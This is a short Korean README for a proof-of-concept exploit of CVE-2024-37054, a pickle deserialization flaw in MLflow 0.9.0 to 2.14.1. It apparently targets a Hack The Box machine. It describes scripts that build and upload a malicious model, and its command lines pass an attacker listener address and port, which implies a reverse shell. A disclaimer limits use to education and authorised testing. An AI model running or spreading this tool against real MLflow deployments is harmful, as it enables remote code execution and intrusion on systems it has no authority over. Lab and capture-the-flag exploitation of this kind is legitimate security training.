
CVE-2024-37054용 PoC
CVE-2024-37054에 대한 개념 증명(PoC)으로, MLflow 0.9.0~2.14.1 버전의 심각한 역직렬화 취약점입니다.
악성 pyfunc 모델이 mlflow.pyfunc.load_model()을 통해 로드되면, pickle된 페이로드가 임의의 코드를 실행합니다.
exploit.py — 전체 익스플로잇: 등록, 학습, 업로드, 트리거 (HTB SmartHire 머신용)build_model.py — 악성 모델을 로컬에서 빌드 (빌드 전용)python3 build_model.py --lhost YOUR_IP --lport 4444
# Auto register account and exploit
python3 exploit.py --lhost YOUR_IP --lport 4444 --atoz
# Use existing session
python3 exploit.py --lhost YOUR_IP --lport 4444 --session "eyJjb21w..."
교육 목적 및 승인된 침투 테스트에만 사용하십시오.